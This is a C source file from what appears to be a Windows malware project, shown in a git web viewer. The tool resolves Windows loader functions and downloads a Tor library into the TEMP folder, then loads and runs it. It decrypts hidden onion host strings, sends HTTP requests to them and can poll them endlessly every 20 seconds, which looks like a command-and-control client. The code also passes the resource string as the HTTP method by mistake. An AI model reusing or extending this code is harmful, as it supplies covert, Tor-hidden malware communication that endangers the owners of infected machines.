aboutsummaryrefslogtreecommitdiff
path: root/source/tools/httpquery.c
blob: a753be685461a5df49394f1071544f95281c18f2 (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
#include "compat.h"

#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <unistd.h>
#include <libgen.h>

#include "crypt.h"
#include "crypt_strings.h"
#include "http.h"


typedef struct opts {
    bool dl_libtor:1;
    bool on_doloop:1;
    char* on_host;
    char* on_res;
    char* on_meth;
} opts_t;

static void usage(char* arg0)
{
    printf("usage: %s [-h] [-l] [-d HOST] [-r RESOURCE] [-m METHOD]\r\n"
                        "\t-h\tthis\r\n"
                        "\t-l\tdownload/run libtor\r\n"
                        "\t-p\tenter dll http loop\r\n"
                        "\t-d\tdestination onion host\r\n"
                            "\t\t\te.g. something.onion\r\n"
                        "\t-r\thttp resource\r\n"
                            "\t\t\te.g. /uri?paramN=valueN\r\n"
                        "\t-m\thttp method\r\n"
                            "\t\t\te.g. GET\r\n"
                        "\r\n", arg0);
}

static void parse_opts(int argc, char** argv, opts_t* po)
{
    int opt;

    if (!po) return;
    while ((opt = getopt(argc, argv, "hlpd:r:m:")) != -1) {
        switch (opt) {
            case 'h':
                usage(argv[0]);
                exit(1);
            case 'l':
                po->dl_libtor = true;
                break;
            case 'p':
                po->on_doloop = true;
                break;
            case 'd':
                po->on_host = strdup(optarg);
                break;
            case 'r':
                po->on_res = strdup(optarg);
                break;
            case 'm':
                po->on_meth = strdup(optarg);
                break;
            default:
                printf("Unknown option: %d\r\n", opt);
                break;
        }
    }
}

int main(int argc, char** argv)
{
    opts_t o;
    const char* arg0 = "httpquery";
    void* loadlib = LoadLibraryA;
    void* getproc = GetProcAddress;

    if (!bInitCompat(LoadLibraryA("KERNEL32.dll"), getproc))
        return -1;

    memset(&o, 0, sizeof(o));
    parse_opts(argc, argv, &o);

    COMPAT(printf)("LoadLibraryA.....: 0x%p\r\n", loadlib);
    COMPAT(printf)("GetProcAddress...: 0x%p\r\n", getproc);

    if (initHttp(loadlib, getproc) != 0) {
        COMPAT(printf)("%s: initHttp(...) failed\r\n", arg0);
        return 1;
    }

    /* download libtor and save it to %TEMP%\libonion.dll */
    if (o.dl_libtor) {
        COMPAT(printf)("%s: download libtor\r\n", arg0);
        int ret;
        char* libPath = NULL;
        if ((ret = downloadLibtor(&libPath)) != ERR_HTTP_OK) {
            COMPAT(printf)("%s: libtor download failed with %d (GetLastError: %u/0x%X)\r\n", arg0, ret, (unsigned)GetLastError(), (unsigned)GetLastError());
        } else {
            COMPAT(printf)("%s: libtor: %s\r\n", arg0, libPath);
            HMODULE libmod = NULL;
            tor_main_t tm = loadLibtor(libPath, &libmod, LoadLibraryA, GetProcAddress);
            COMPAT(printf)("%s: libmod: %p, tormain: %p\r\n", arg0, libmod, tm);
            /* run tor main loop */
            tm(59050, 0xdeadc0de);
        }
        if (libPath)
            COMPAT(free)(libPath);
    }

    struct http_args hArgs = {0};

#ifdef _HTTP_LOCALHOST
    DBUF(HTTP_HOST_LOCAL_ENUM, __hosts);
    char __onion[1] = {0};
#else
    DBUF(HTTP_HOSTS_ENUM, __hosts);
    DBUF(HTTP_ONION_ENUM, __onion);
#endif

    char* cur = NULL;
    char* end = NULL;
    get_string_in_strings_di(__hosts, 0, &cur, &end);

    size_t hostLen = strlen(__onion) + strlen(cur);
    char host[hostLen+1];
    snprintf(&host[0], hostLen+1, cur, __onion);

    hArgs.host        = (o.on_host != NULL ? o.on_host : host);
    hArgs.hostLen     = strlen(hArgs.host);
    hArgs.resource    = (o.on_res != NULL ? o.on_res : "/");
    hArgs.resourceLen = strlen(hArgs.resource);
    hArgs.method      = (o.on_meth != NULL ? o.on_res : "GET");
    hArgs.methodLen   = strlen(hArgs.method);

    rrbuff out    = NULL;
    rrsize outSiz = 0;
    DWORD status = 0;
    int ret = sendHttpRequest(&hArgs, &out, &outSiz, &status);
    switch (ret) {
        case 0:
            COMPAT(printf)("Success: %u\r\n", (unsigned)status);
            break;
        default:
            COMPAT(printf)("Error: %d (GetLastError: %u/0x%X)\r\n", ret, (unsigned)GetLastError(), (unsigned)GetLastError());
            break;
    }

    if (out && outSiz > 0)
        COMPAT(printf)("Website content (Status %d, Size: %u):\n%s\r\n", (int)status, (unsigned)outSiz, out);

    if (o.on_doloop) {
        printf("Enter HTTP Loop ..\n");
        while (1) {
            httpLoopAtLeastOnce();
            sleep(20);
        }
    }

    if (o.on_host) free(o.on_host);
    if (o.on_meth) free(o.on_meth);
    if (o.on_res) free(o.on_res);
    return ret;
}